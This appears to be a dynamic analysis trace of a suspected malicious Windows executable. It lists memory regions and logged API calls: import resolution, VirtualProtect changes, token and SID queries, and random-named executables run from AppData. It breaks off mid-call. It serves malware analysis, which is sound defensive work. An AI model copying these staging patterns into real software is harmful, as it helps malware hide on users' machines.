0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24544 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24545 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24546 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24547 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24627 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24628 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24629 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24630 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24631 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24642 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24643 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24644 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24645 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24646 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24783 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24784 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24785 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24786 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24787 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24788 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24789 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24790 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24791 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24792 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 24935 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24936 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 24937 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 24938 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24939 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Thread: id = 40 os_tid = 0xc44 [0100.741] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0100.741] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0100.742] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0100.743] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0100.744] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0100.745] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0100.745] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0100.745] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0100.747] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0100.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0100.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0100.749] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0100.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0100.749] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0100.749] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0100.749] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0100.749] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0100.749] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0100.749] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0100.750] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0100.750] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0100.750] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0100.750] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0100.750] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0100.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0100.750] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0100.750] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0100.750] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0100.750] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0100.751] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0100.751] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0100.751] SetThreadLocale (Locale=0x400) returned 1 [0100.751] GetVersion () returned 0x1db10106 [0100.751] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.751] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0100.751] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.751] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0100.751] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.751] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0100.751] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0100.752] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.752] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0100.752] GetACP () returned 0x4e4 [0100.752] GetCurrentThreadId () returned 0xc44 [0100.752] GetVersion () returned 0x1db10106 [0100.752] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x221d10, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.752] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.752] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.752] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1270000 [0100.752] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.752] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.752] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.752] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.753] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.753] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.753] GetUserDefaultUILanguage () returned 0x409 [0100.753] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0100.753] GetThreadUILanguage () returned 0x120409 [0100.753] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0100.754] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x139a680, pcchLanguagesBuffer=0x12d768 | out: 